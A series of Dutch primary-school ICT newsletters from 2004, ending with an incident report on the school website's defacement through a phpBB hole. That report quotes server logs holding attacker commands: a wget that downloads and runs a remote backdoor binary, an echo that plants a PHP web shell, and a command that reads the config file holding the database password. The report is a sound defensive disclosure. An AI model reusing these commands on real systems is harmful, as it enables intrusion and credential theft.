http://www.computersopschool.nl/

Emailadres

Alle groepen hebben nu een emailadres via de webmail.
Volgende week zal uitgelegd worden -in een vergadering-hoe het allemaal werkt. Geen (f)outlook meer!!!

Website van de Rosa Boekdrukker

We hebben deze week wat geëxperimenteerd met de kleuren op onze website.
We gebruikten daarvoor een heel handig programmaatje waarmee de kleuren kunnen worden aangepast. zie: http://www.grafxfreeware.homestead.com/colorselector.html en http://www.tucows.com/preview/304878.html
Graag horen wij commentaar op de kleuren.
Onze school wordt vaak genoemd http://www.fransonline.nl/modules.php?name=News&file=article&sid=3741

Op deze website staat een interview met iemand die S@S heeft gebruikt voor een schoolsite en er lovend over spreekt.
Ook kregen we een tip, dat in een publicatie van het Ministerie van Onderwijs onze school wordt genoemd. http://www.minocw.nl/brief2k/2004/doc/45746.pdf
Probeer ook eens “Rosa Boekdrukker” in te tikken in Google. Dan zie je, dat de linken met het oude IP adres niet werken, maar er zijn alweer genoeg nieuwe linken die het wel doen. Dus in een maand tijd is onze roem flink gestegen!

S@S

Voor Site@School is het aftellen begonnen! A.s. zondag komt versie 2.2. uit. Het is de mooiste die we hadden en we zijn er zeer trots op Hulde aan alle medewerkers. Uit het forum horen we dat velen er al naar uitkijken. Ondertussen zijn we al weer bezig aan de volgende versie. We testen een chat, en we willen de directory structuur aanpassen. Verder zit in de nieuwe versie het Italiaans. Daarmee komt het aantal talen op 15.

SoS

ServerOpSchool is in de herfstvakantie geïnstalleerd op de Joop Westerweelschool. Dat liep prima en tot onze stomme verbazing installeerden verschillende educatieve programma’s zich dit keer zonder de minste problemen. Het lijkt erop dat de modernere versies van Wereld in Getallen, Maatwerk Blauw en Oranje, Zwijsen Software Manager, vrijwel probleemloos gingen.
Op de JW hebben ze 70 windows werkstations. Met ons nieuwe backup tool was het neerzetten van images een klusje dat zelfs een kleuter had kunnen uitvoeren.
Met het backup tool kunnen ook virusscans gedaan worden. Het werkt als een zonnetje. Het grote voordeel is dat de virusscanner gratis is. Dat spaart dus heel wat euro’s, ieder jaar weer.
Voor de ICT’er was het een eye opener om te zien hoe eenvoudig bestanden delen werkt en hoe makkelijk je groepen programma’s op het bureaublad geeft.

groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-11-05 w45

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 45 - 2004 (5 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Sinterklaas komt er weer aan.

Lessugesties nodig? Kijk eens hier: http://www.kennisnet.nl/special/sinterklaas/

Aanpassing bureaubladen

Deze week hebben we alle bureaubladen van de groepen aangepast. De bedoeling is, dat elke keer bij het inloggen de vaste gegevens terugkomen en dat alle veranderingen aan het bureaublad ongedaan gemaakt worden. Einde van dubbele pictogrammen en fantasierijke achtergronden en vreemde extra balken in de browser. Dat aanpassen kan ook heel gemakkelijk van afstand worden gedaan.

ICT in onze personeelsvergadering

Gebleken is, dat om de afspraken over de ICT leerlijn goed vast te houden het nodig is om ICT regelmatig op de vergadering te laten terugkomen. Deze week hebben we wat nieuwigheden in het netwerk aan de orde gesteld. Ook hebben alle leerkrachten een emailadres gekregen in onze eigen webmail.

Printers stuk

In de bovenbouw begaven deze week twee netwerk printers het. Het zijn hele zware machines die volgende week gerepareerd zullen worden. Het komt regelmatig voor, dat er hele wachtrijen documenten in staan. Leerlingen die niet direct hun printje krijgen drukken nogmaals in plaats van te kijken welke melding er op het schermpje in de printer staat.

S@S en SoS

S@S

Deze week kwam versie 2.2 van S@S uit. Veel positieve reacties. En dankzij onze intensieve Forum community ( http://rosaboekdrukker.net/phpBB2/ ) Van testers en gebruikers kwamen de eerste bugjes al binnen. Hartelijk dank jullie allen!

De nieuwe versie was nog niet uit of we hadden weer een paar prima extra features: leerkrachten pagina’s en in de kalender kun je nu periodes invoeren. Dan hoef je niet 7 keer ‘Herfstvakantie’ te tikken.

SoS

Weinig te melden, alhoewel we hard werken. Deze week de OBS Corantijn afgerond. De Sterrenwachters zijn ook klaar. Nu de Joop Westerweel nog en de OBSRB. Maar ja, bij die laatste denken we: “Bij de loodgieter lekt het...”
We merken uit een paar hoeken belangstelling voor SoS.
We zijn bezig met de gebruiksaanwijzingen.

groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-11-09 w46

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 46 - 2004 (12 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

drukke week!!!!

Alles Telt

Er is dit schooljaar een zesde kleutergroep gevormd. Er klopte niets meer van de ingevoerde leerlingen. Deze week is alles opnieuw ingevoerd en elke groep heeft weer een blad met de namen en iconen die de kinderen nodig hebben om in te loggen. De behoefte is groot, dat ook kleuters op hun eigen naam kunnen inloggen. Niet voor elk programma een ander icoon, maar gewoon hun eigen naam; kleuters kunnen hun eigen naam echt wel herkennen! We zullen het eens voorstellen bij de uitgeverijen.

ICT-leerlijn

We zitten er aan te denken om onze ICT leerlijn publiek te maken, open te stellen voor aanvullingen van buiten, zodat het een voor veel scholen bruikbaar geheel wordt. Maar... er zitten oefeningen in Word in. Dat willen wij natuurlijk eigenlijk niet, als voorstanders van Opensource producten. (zie ook: http://www.ossinhetonderwijs.nl/) We zijn nu aan het bedenken hoe we de beschreven oefeningen kunnen (laten) vertalen naar OpenOffice en een ander tekenprogramma. We verkeren nog in een brainstorm stadium. U hoort nog meer. En we staan natuurlijk open voor suggesties.

Aardrijkskunde nieuwsbrief

Er is weer een aardrijkskunde nieuwsbrief uit. http://rosaboekdrukker.net/index.php?section=10&page=707 Met links over de V.S. en Zuid Holland.

APS

We hebben licenties voor het gebruik van Windows en Word op onze computers. Helaas hebben we die nog een jaar nodig. Voor 1 december moet alles netjes opgegeven zijn. Dat gebeurt tegenwoordig allemaal via het internet.

Praxis Bulletin

Wij hebben al jaren een abonnement op het PRAXIS bulletin. Ze hebben een website waar je allerlei artikelen uit het verleden kunt terugvinden. Maar je moet wel inloggen. Een jaar geleden ontvingen we een brief met een speciale inlognaam en wachtwoord. Maar dat werkt niet meer. Het bleek dat te veel scholen dat kwijt raakten. Dus de oude manier is weer geldig: in het papieren tijdschrift staat het wachtwoord van de maand. www.praxisbulletin.nl Wachtwoord van november is Berlijn. Van december is.......ja....Madrid!!

Als je een POP UP KILLER hebt, dan moet je allerlei maatregelen nemen om in te loggen. Eén van ondergetekenden heeft de grootste ruzie met de site; door de popupkiller verschijnt het inlogschermpje niet. Waarom kan het niet GEWOON?? Jammer.

MALMBERG LETTERPRET

De never-ending-story is nog niet klaar!!! We ontvingen deze week een aanmaning om het gebruik van Letterpret over 2003 te betalen. Die herinnering ontvingen we in maart j.l. ook. Het antwoord op die aanmaning hebben we maar even aangehaald in ons antwoord van deze week.
Betalen voor Letterpret? We hebben hen een rekening gestuurd: zij moeten ons betalen voor alle moeite die we hebben gedaan om het programma te laten werken. Ze mogen ons dankbaar zijn voor al het werk en alle foutmeldingen die we aan hen bericht hebben, anders werkte het nog steeds niet in een netwerk!!!

GEK

Deze week werd een aantal docenten gek van vervelende meldingen met Word 2000. Heel vaak als je terug gaat in je document om iets te veranderen wordt gemeld, dat er een functie van de spelling controle niet is geïnstalleerd en of we de cd willen plaatsen.
Maar de spelling controle doet het wèl. Uiteindelijk hebben we de cd er maar eens in gedaan en het lijkt of het probleem is opgelost. Maar begrijpen doen we het niet. Je kan ook niet overal verstand van hebben.

NETWERK

Printers

Deze week zijn onze printers schoongemaakt en kleine reparaties zijn verricht. Er waren er een paar kapot. Het blijkt dat enkele van deze deze printers (HP Laserjet4MV) die we van onze gemeentelijke dienst hebben gekregen, nog erg weinig gebruikt zijn. We kregen toen ook ‘fusers’ en die bleken nodig voor revisie. We kunnen er dus nog jaren mee voort en de schoonmaakbeurt /revisie ad € ....(we hebben nog geen rekening ontvangen) is een goede investering geweest.

Windows sluit niet af.

Na de zomervakantie sluiten opeens een heleboel computers niet meer vanzelf af. Dus nu de patch uit 1999 maar eens geïnstalleerd. En ja hoor. het helpt! Nu moet het nog worden aangepast op het image.

Een goede daad

De oude servers die we hadden en die wij als krijgers hadden ontvangen, zijn deze week opgehaald door een school uit Zeeland. Ze hebben daar weinig leerlingen en dus een klein ICT budget. Ze zijn hartstikke blij met onze spullen.

Kapotte computer

Onze ICT coördinator heeft een computer gemold door te hard een schakelaartje te ‘repareren’. Daarbij brak ook het plastic houdertje af dat in de kast de schakelaar vasthoudt. Ze had al bijna een nieuwe computer besteld. De vrijwilliger zal in de onderdelenbak kijken of er nog een inbouwschakelaartje over is.

S@S en SOS

S@S

Deze week is onze website “gemigreerd” naar S@S 2.2. We kunnen nu dus zelf ook van de nieuwste snufjes gebruik maken. Het is een genot om in te loggen en de mooie nieuwe ikonen te zien. Wie eens een kijkje wil nemen: onze testsite is daarvoor bedoeld http://wyxs.net/daily/starnet/

inloggen met “tester” en het wachtwoord is “tester”. Iedere nacht wordt de site gewist en is ie weer ‘schoon’. Het kan zijn dat de taal niet op Nederlands staat. Dat moet je dan even aanpassen.

Ouders - hoera!!!

Vanuit de oudergeleding van onze school is er belangstelling om de jaarkalender te gaan bijhouden op de website. Eén ouder heeft nu toegang tot S@S. We zijn benieuwd of het gaat lukken: ouders die een deel van de website gaan beheren.

groeten en een prettig weekend
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-11-19 w47

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 47 - 2004 (19 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT leerlijn

Door verschillende mensen wordt er druk nagedacht over hoe we de leerlijn voor iedereen toegankelijk kunnen maken en over een site waar de lijn op kan en waar mensen bijdragen kunnen leveren aan de oefenstof.

Lessuggesties

Kijk op http://rosaboekdrukker.net/index.php?section=10&page=708 Weer allemaal leuke tips voor het sinterklaasfeest.

Letterpret

Deze week ontvingen we een CREDIT nota van Malmberg. Nee, niet de door ons gevraagde € 5000.- schadevergoeding. Maar € 80.- Waarvoor die 80 euro zijn stond er niet bij.

TECHNISCHE INFORMATIE

Rekening

De rekening van het verzorgen van onze printers is binnen. € 325.-, inclusief btw en voorrijkosten. Dat is niet duur voor 5 printers die weer jaren meekunnen volgends de onderhoudsmonteur. Eén van de printers had maar 25000 exemplaren op de teller. “Net ingereden” zei de monteur.

Onze gulle gemeentelijke gever

Deze week kwam er weer een flinke partij overtollig materiaal van onze gemeentelijke dienst. Tape streamers, monitoren, printers, printservers, thin-clients) Wat wij niet nodig hebben wordt doorgegeven aan andere scholen. Belangstelling?

Beursbezoek

Peter en Dirk bezochten de “Ict en beheer” beurs in Nieuwegein.

Hier een kort verslag.
”Wat ons opviel was de grote aanwezigheid van harwarebeveiligingsstands. Er wordt blijkbaar heel wat afgestolen op dit gebied. Wij zagen er een pleidooi in voor tweedehands computers.
Dat bracht ons bij de stand van Arcom-IT, waar wij hartelijk werden ontvangen door Ewald van der Blij. We kenden hem al van diverse aankopen (hd-s voor de OBSRB en onlangs uitstekende tweehands PIII-733 computers voor een andere school). Even fysiek kennis gemaakt, een prima kontact.
Vandaar naar de stands met, ja ja, content management systemen. Dat was lachen! Prijzen bij de één van 25 tot 95 euro per maand (met gastenboek!). Bij de tweede voor € 2500.- per server en bij de derde was de prijscourant fout bij de drukker vandaan gekomen, dus die hadden geen prijzen. Gelukkig waren we incognito, dus hoefden we niet uit te leggen, dat S@S veel goedkoper en beter is.
Toen weer iets echt leuks. We kwamen Raoul tegen, van ICT-opschool. Prima om even bij te praten, en hij kwam weer met goede ideeen
Tijd voor de concurrenten van serveropschool. De enige die in de buurt kwam was PARADIGIT, maar ja, moet je wel nieuwe computers bij hen kopen. Daarnaast kost het dan maar € 35.- per computer per jaar. Het gerucht klopte dus. Onlangs luisterden we in de trein een gesprek af. Eén van de mensen van (blijkbaar paradigit) zei, dat de PCprivee projecten door de belastingmaatregel aan het instorten waren en dat ze zich nu concentreren op scholen (“daar kun je heel wat computers wegzetten”)
Bij de andere leveranciers grote verhalen, maar geen prijzen.
Samengevat: leuk voor de contacten., maar verder geen nieuwe dingen.”

Laatste nieuws, latest news, letsten Nachtrichten

Sinds zonet is de vertaalsite van het site@school project geopend. “http://wyxs.net “ Met deze site is het mogelijk dat veel mensen tegelijkertijd online aan vertalingen van de handleidingen werken. Als je wilt meewerken aan de Nederlandse handleiding, dan kun je je bij ons aanmelden, dan krijg je een account en kun je zo aan het werk. Het Engelse manual (handleiding) is het uitgangspunt. De opzet is zodanig, dat je ook bijvoorbeeld maar één hoofdstuk kunt vertalen, als je dat wilt. Kennis van de Engelse taal is dus wel een voorwaarde om mee te kunnen doen.
Fred heeft veel denkwerk en een prachtig template in de site zitten.

een prettig weekend!
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-11-24 w48

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 48 - 2004 (26 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT leerlijn

Digiwijzer

Vanaf januari zal module 2 gebruikt kunnen worden door groep 7 en 8. Dan zullen ook de klassenconsulten plaats vinden. Die zullen gedaan worden door Anja, zij is een taalspecialist. De nadruk zal dus komen te liggen op de taalkant en de organisatiekant van het programma.

Groep 4

Ook zal na de kerstvakantie het emailproject voor groep 4 starten. Er zal weer een dier gaan logeren en er moet dus een school worden gezocht die het ook wil doen.

Kleuterbouw.

Nu Letterpret het goed doet (!!!) zal het accent daar op komen te liggen de komende periode. Een taalspecialist van het ABC zal naar de didactische kant van het programma met ons kijken.

Remediëring

Op 13 december gaan Marianne, Hedy en Karin naar het ABC om het programma LEESLADDER door te spitten op het gebruik van de verschillende onderdelen. Welke oefeningen zijn voor welk soort leesproblemen? Hoe zet je het nuttig in? etc.

Remediërende rekensoftware

Er is een vraag gekomen vanuit het team naar rekensoftware voor rekenproblemen. Daarvoor zullen we een programma moeten zoeken dat ook aansluit bij onze methode. Bij Wis en Reken is op dit moment alleen software voor groep 4 verschenen. Graag op een bouwvergadering bekijken waar precies behoefte aan is. We zouden eens naar het programma Maatwerk kunnen kijken.

Voortgang ICT leergang

Deze week heeft er een gesprek plaats gevonden tussen de Rosa B. en de Educatieve Faculteit Amsterdam, op zoek naar stagiaires die ons gaan helpen met het omzetten en uitbreiden van onze bestaande ict-leerlijn naar een opensource leerlijn met opensource programma’s.

Docentenplein 109

Alweer een nieuwe nieuwsbrief met allerlei handige tips: http://rosaboekdrukker.net/index.php?section=10&page=709 Voor de klokhuis agenda is het beter om te kijken naar de site van de Rosa Boekdrukker. (http://www.rosaboekdrukker.net/index.php?page=658&section=4) Daar staat de agenda tot en met 10 december 2004

SOS en S@S

SOS

Bezoek van delegatie uit Franeker. Matthijs, één van de eerste gebruikers van Site@School, http://www.deopslagh.nl , was naar Amsterdam gekomen om zich te oriënteren op SoS. Peter en Dirk gaven een demo op de OBSRB en de Joop Westerweel. Jullie horen er nog van.
Vandaag zitten P. en D. op de JW om daar de laatste klusjes te doen: Het Cito leerlingvolgsysteem zit nu op de server en de Windows clients. Esis draait op de clients en de server. Van EducatB moeten we de data nog overzetten. Kortom, bijna klaar.

S@S

Vertaalproject:

Vorige week sloeg de zetduivel toe waardoor de URL van het vertaalproject niet goed in de BIC kwam. Hier is ie nog een keer: http://wyxs.net/manuals/
Het gaat ongelofelijk goed! Er zijn nu 3 Nederlandse vertalers, 2 Duitse en gisterenavond meldde zich een Argentijn voor de Spaanse vertaling. Als je meewilt doen, meld je aan en doe een hoofdstuk. Vele handen maken licht werk!

s@s en de leerlijn:

Fred is bezig met een 'pdf knop’ waardoor de pagina’s met oefeningen in de leerlijn met één druk op de knop in PDF formaat beschikbaar zijn. Dan hoeven ze alleen nog maar onder de kopieermachine en kunnen dan zo de klas in.
Jullie snappen natuurlijk wel dat de volgende stap is dat een leerling de snelkoppeling met de opdracht op zijn bureaublad vindt en meteen aan de slag kan.

Template editor:

We beginnen vragen van scholen te krijgen om op eenvoudige wijze zelf het template te kunnen aanpassen aan de wensen van de school. Daartoe heeft Fred de template editor ontwikkeld. Je kan nu zelf een eenvoudig template voor S@S maken. PHP of HTML kennis is niet nodig. We hopen dat ie gauw klaar is.

Meld je aan als tester.

groeten en een prettig weekend Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-12-03 w49

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 49 - 2004 (3 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT leerlijn

ICT als vast punt op de teamvergaderingen.

Dit schooljaar staat bijna altijd ICT op de agenda van de vergaderingen. Zo hebben we deze week besproken, dat de ICT coördinator zal kijken of het programma “Maatwerk” voldoet aan de criteria die we als team voor software hebben vastgesteld. De inhoudelijke kant van het programma is onderzocht door de rekenspecialist in ons team.

Opdrachten voor groep 5 en 6

Groep 5 kan aan de slag met opdrachten tekstverwerking.
Groep 6 is begonnen aan opdrachten met Digiwijs. Ze oefenen nu in het zoeken op een webpagina

Wis en Reken software.

Van de uitgeverij Bekadidact kregen we eerst sombere berichten over de werking van hun software. Na wat extra uitleg van onze kant kregen we het volgende bemoedigende antwoord:

“Ik heb bij de softwareontwikkelaar geïnformeerd of de software wel kan draaien onder Samba. Ik kreeg het volgende antwoord: “In principe moet het kunnen. Samba is een fileserver. De school heeft dan alle bestanden onder Samba op Linux staan. Een client computer haalt de bestanden over het netwerk van die server en runt ze lokaal. Maar het is niet helemaal zeker of het kan. Dat zou eerst getest moeten worden. Er kunnen problemen zijn met filenamen (namen die Windows wel uit elkaar kan halen, maar Samba niet, of namen die voor Windows hetzelfde zijn maar voor Samba niet (denk aan lengte en hoofd- en kleine letters).” Zodra we de demo helemaal klaar hebben, dan krijgen alle scholen er één toegestuurd. Dat zal begin maart 2005 zijn. U kunt dan kijken of deze onder Samba draait. Eventueel kunt u ook de eerste echte CD (groep 5: eind april) eerst laten uitproberen voordat u hem echt aanschaft.”

Natuurlijk zijn we bereid om de software op de Samba-server te testen.

Ons Netwerk

Deze week hadden we opeens bij een deel van onze computers uitval uit het netwerk. Toen bleek dat we geen duidelijk beleid hebben wat te doen bij storingen. Op die dag was de ICT coördinator niet op school. We moeten dus een protocol hebben. Tot nu toe kon er altijd meteen een beroep gedaan worden op Dirk, maar nu we ons hebben aangesloten bij Server op School vindt het beheer op een andere manier plaats. Toch heeft Dirk wel geconstateerd dat het aan één van de switches ligt en heeft Karin laten zie hoe je die moet resetten.
Na het resetten werkte alles weer, maar na een paar uur was het weer mis. Nu zie je opeens het voordeel van twee switches: je kan door wat ompatchen zorgen dat degenen die de computer het meeste nodig hebben, gebruik kunnen maken van de (beperkte) capaciteit. Wat we nooit gedaan hebben, maar volgende week gaan uitvoeren is het verdelen van onze twee switches over verschillende computers. Voorbeeld: bij de directie staan twee computers. Je vergroot de werkbaarheid door computer A op de ene- en computer B op de andere switch te zetten. Een ding weten we nu zeker: koop nooit 1 switch met grote capaciteit, maar koop twee met halve capaciteit. Als we een nieuwe kopen, dan nemen we er een met twee gigabit aansluitingen. Dan kan je met één gigabit naar de server en met 1 gigabit naar de tweede switch.

OPENING JOOP WESTERWEEL

Peter en Dirk waren op de opening van de Joop Westerweel. Strak in het pak zittend, met onze zijden Linux stropdassen, werden we aangezien voor de Clini-clowns. Het was een leuke opening en goed voor de contacten.

KPN vergoeding

Let op!
In de nieuwsbrief van “ICTopschool” staat te lezen: “KPN laat weten dat scholen hun vergoeding voor de migratie naar het gratis KPN-aanbod voor 31 januari a.s. moeten declareren.” Zie: hier

Dat was het weer.
Groeten en een goed weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-12-10 w50

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 50 - 2004 (10 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

een hele lange BIC (wegens onze defacing) met een zeer technische staart

ICT in de vergadering

Deze week is vermeld, dat we werken aan het protocol: “hoe te handelen bij storingen?” Uit het team kwam naar voren, dat er weer gesurft is op onbetamelijke sites. In de volgende vergadering zullen de regels weer eens besproken worden. Want ook is gesignaleerd, dat er kinderen zonder opdracht en zonder toezicht zitten te computeren. Tja, dat vraagt om problemen!!

Maatwerk

Het onderzoek naar de criteria om software aan te schaffen is positief uitgevallen voor het programma Maatwerk. Het heeft een instaptoets dat het niveau van de leerling bepaalt en een handelingsplan voorlegt. We zijn benieuwd. We moeten het natuurlijk nog wel even zelf uittesten. Het is van de firma Malmberg...... 8 jaar lang zouden we 111 euro jaarlijks voor het gebruik ervan moeten betalen.

Microsoft licenties

Deze week hebben we onze registratie voor het gebruik van Microsoft producten in orde gemaakt bij het APS. We hebben nu naar eerlijkheid onze 50 computers opgegeven. Meer dan 700 euro betalen we voor het gebruik van lekkende software. We hopen dat het over een jaar niet meer nodig is en dat we voor die uitgespaarde 750 euro leuke bibliotheekboeken kunnen kopen!

Opmerking in gastenboek

Een paar weken geleden vonden we vervelende opmerkingen in ons gastenboek. Een snel speurwerk van Dirk en Peter leidde naar het Ip-adres van de school waarvandaan de lelijke woorden kwamen. Een email naar de school heeft ertoe geleid, dat de daders zijn gepakt. Ze hebben hun excuses in ons gastenboek gezet (http://www.rosaboekdrukker.net/index.php?section=5 ).

Switches

Karin is door het stof gegaan om op alle stekkerdozen van de netwerkstopcontacten de nummers af te lezen. Eerst moesten ze genummerd worden en moest worden opgeschreven welke computer met welk MAC adres in de contactdoos zit. Dirk heeft alle computers losgetrokken en daarna zijn we alle computers om en om in een van de twee switches gaan steken. Meteen hebben we te lange draden vervangen door kortere draden. We hebben nog maar drie gaten over, dus moet er een switch bijkomen. We hebben nog niet ontdekt waardoor vorige week de ene switch is uitgevallen. Nu net op de valreep van de publicatie van deze BIC heeft Dirk ontdekt wat er aan de hand is: oververhitting! De ventilatoren van de onderste switch zijn vervuild en draaien niet op volle toeren. Dirk zal ze schoonmaken.

SITE@SCHOOL

Complimenten

Vandaag werden we gebeld door een ouder van een school in Amsterdam Zuid die zo enthousiast is over S@S, en de makers een compliment wilde maken. Daar zijn we erg blij mee. Het is trouwens zeer de moeite waard om eens een kijkje te nemen bij andere sites die S@S gebruiken. Zie: http://siteatschool.sourceforge.net/index.php?section=6 Het stond al lang op het programma om S@S zeer grondig aan te gaan pakken. Het programma is meer dan twee jaar jong, er is door verschillende mensen van alles aan ge- en versleuteld, waardoor het soms wat chaotisch is. Peter heeft een paar dagen in de code gekeken en deze week hadden Peter, Fred en Dirk een eerste bespreking waarin een paar vragen centraal stonden: - hoe kan S@S veiliger. Dit item stond al op het programma lang voor de defacing (zie onder). - hoe kan S@S duurzamer. Steeds meer scholen gebruiken S@S en dat schept verantwoordelijkheden; voor nu en in de toekomst. Over de jaren moet er ook door anderen aan doorontwikkeld kunnen worden. Er komt een developers manual en grotere uniformiteit in de code. - hoe komen we van allerlei 'erfenissen uit het verleden' af, zonder de  oude gebruikers met problemen op te zadelen. S@S is een beetje uit zijn jasje gegroeid, en dat is reden om zaken opnieuw te overdenken en fundamenteel aan te pakken. Kortom, er gaat een hoop werk aan S@S verricht worden waar de gewone gebruiker helemaal niets van zal merken. Echter, goedwillende lieden zullen makkelijker kunnen meewerken en kwaadwillend gespuis zal zijn tanden stukbijten op S@S.

DEFACED :-(((

Het is ons overkomen: gedurende enkele uren is onze website 'overgenomen' door redelijk aardige onverlaten (defacen - het gezicht weghalen). Hier is het complete relaas. Lees het en wees gewaarschuwd.

Een paar dagen eerder had Peter ons gemeld dat er een kwetsbaarheid was ontdekt in het forum dat wij gebruiken (phpBB). Hij raadde ons aan om te upgraden want de patch om het gat te dichten was al beschikbaar. We waren nog niet uitgedacht over hoe en wanneer we e.e.a. zouden aanpakken of de Rosa Boekdrukker website was verdwenen en vervangen door een Braziliaanse tekst: Simiens Crew, Enquanto houver fome e guerra simiens existira Betekenis (dank aan Anrik): Simiens Crew, Zolang er honger en oorlog is dan zal Simiens blijven bestaan.

Gelukkig had Karin het snel in de gaten. Peter gebeld die de zaak snel in orde maakte door het Forum offline te halen en onze eigen site weer online te zetten. Het forum werd hernoemd om te kunnen achterhalen wat de schade kon zijn en om conclusies te kunnen trekken over de te nemen maatregelen. We voelen ons zeer gepakt.

Peter heeft de logfiles bestudeerd. We willen je e.e.a. niet onthouden onder het motto: "We zijn een school, dus gericht op het _delen_ van kennis". En merken daarbij op: Je moet 't ook delen als het niet leuk is. Lees en huiver!

”Ik (Peter) heb nu alle relevante logfiles doorgespit, voor details zie onderaan dit bericht. Management summary: Er zijn in totaal 4 (potentieel) gevaarlijke dingen gebeurd. 1. Het downloaden van een binair programma cbsd om een backdoor te creëren. Gestopt dankzij Mourani's achterdocht. (21-11-2004) 2. De configuratiefile van het forum is achterhaald; het MySQL-root password is nu bekend (maar inmiddels gewijzigd) (29-11-2004) 3. Defacement door een Braziliaans clubje onder de naam "Simiens Crew". Helaas gelukt, maar heeft gelukkig de aandacht getrokken. (03-12-2004) 4. Een ingewikkeld Perl-script zou uitgevoerd hebben kunnen worden als niet op dat moment de hele phpBB2 niet al uit de lucht was gehaald door mij. (04-12-2004) Voor de rest zijn er ettelijke succesvolle pogingen geweest om het commando 'id' uit te voeren. Daar is verder geen actie op ondernomen door de indringer(s). De problemen traden voor het eerst op op 21 november, dus mijn eerste advies inzake upgrading (van 1 december) was sowieso al aan de late kant, blijkt achteraf. Het forum is op 3 december stilgelegd, vrij snel na Karin's melding.”

Hier zijn relevante zaken uit de logfiles.

Nu wordt het echt technisch. Voor de doordouwertjes onder jullie:


209.236.124.24 - - [21/Nov/2004:19:01:58 +0100] wget http://ov3r.passwd.at/sh111t/cbsd -O /tmp/cbsd; chmod +x /tmp/cbsd; /tmp/cbsd 202.3.141.157 55555

Dit herhaalt zich zo'n 20 keer. Laatste in die serie:

209.236.124.24 - - [21/Nov/2004:19:02:16 +0100] wget http://ov3r.passwd.at/sh111t/cbsd -O /tmp/cbsd; chmod +x /tmp/cbsd; /tmp/cbsd 202.3.141.157 55555

Daarna vanaf dezelfde IP:

209.236.124.24 - - [21/Nov/2004:19:02:20 +0100]id;uname -a;

Uitleg:
Met wget wordt van de host ov3r.passwd.at een binair programma opgehaald. Dit programma wordt uitvoerbaar gemaakt en zou zo te zien contact met host 202.3.141.157 moeten leggen. Ik vermoed dat dit programma een login-shell opent! Vreemd is alleen dat deze poging zo'n 20x herhaald wordt binnen 18 seconden. Zou het soms niet lukken? Mmmm.... Nadere bestudering wijst uit dat Mourani standaard /tmp het attribuut noexec meegeeft. Hoezee: elke executable in /tmp levert een melding Permission Denied op! Wat er gebeurd is is niet na te gaan maar ik schat eigenlijk dat er dus niets gebeurd is...

Hosts:
24.124.236.209.in-addr.arpa domain name pointer filtercube1.edumaster.net.
157.141.3.202.in-addr.arpa domain name pointer host.toukatsu-clinic-hospital.jp. ov3r.passwd.at has address 67.43.11.126
Host 126.11.43.67.in-addr.arpa not found: 3(NXDOMAIN)

Gegevens bij domein passwd.at:
personname:     Salvatore Cangialosi organization:
street address: 223 Academy Drive
postal code:    USA-01106
city:           Longmeadow
country:        USA
phone:          +14137855668
e-mail:         blax@post.com
nic-hdl:        SC1665235-NICAT
changed:        20040824 16:33:13
source:         AT-DOM


213.144.148.19 - - [21/Nov/2004:22:44:10 +0100] echo;echo ---dcha0s---;id;echo ---dcha0s---;echo
Host:
19.148.144.213.in-addr.arpa domain name pointer kunden1.livenet.ch.


193.232.254.217 - - [24/Nov/2004:03:15:35 +0100] echo C3NZOR3D
193.232.254.217 - - [24/Nov/2004:22:08:18 +0100] echo \<\?\ passthru\(\$_GET\[\'cmd\'\]\)\ \?\> > tmp.php

Host:
217.254.232.193.in-addr.arpa domain name pointer proxy.karelia.ru.


200.225.194.49 - - [27/Nov/2004:18:59:11 +0100] id
Host:
49.194.225.200.in-addr.arpa domain name pointer 225-194-049.ctbctelecom.com.br.


200.193.77.75 - - [27/Nov/2004:21:41:09 +0100] id
Host:
75.77.193.200.in-addr.arpa domain name pointer 200-193-077-075.jvece7001.dsl.brasiltelecom.net.br.


200.76.229.206 - - [29/Nov/2004:06:55:26 +0100] tail config.php

Beschrijving:
Dit commando laat de inhoud zien van de configuratiefile, met daarin --helaas-- het root-wachtwoord van de MySQL-database. Dat zal dus anders moeten. Sorry. Wijze les: iedere databaseapplicatie zijn eigen userid en wachtwoord. Nu is het MySQL-rootpassword compromised en moeten alle applicaties aangepast worden.
Overigens is het password inmiddels gewijzigd per 2004-12-09 16:30 uur.

Host:
206.229.76.200.in-addr.arpa domain name pointer red-corpb36ADSL-206.telnor.net.
Referer (!): http://200.58.112.84/~moneos/phpbb-exploit.php


201.8.131.11 - "" [01/Dec/2004:03:29:02 +0100] uname -a;id;pwd;


200.98.137.119 - - [01/Dec/2004:04:07:37 +0100] uname -a;id;pwd;


200.162.208.31 - - [03/Dec/2004:12:19:40 +0100] id echo UN_COMECO;echo UN_COMECO;uname -a;id;echo UN_FIM
etc. etc. etc.


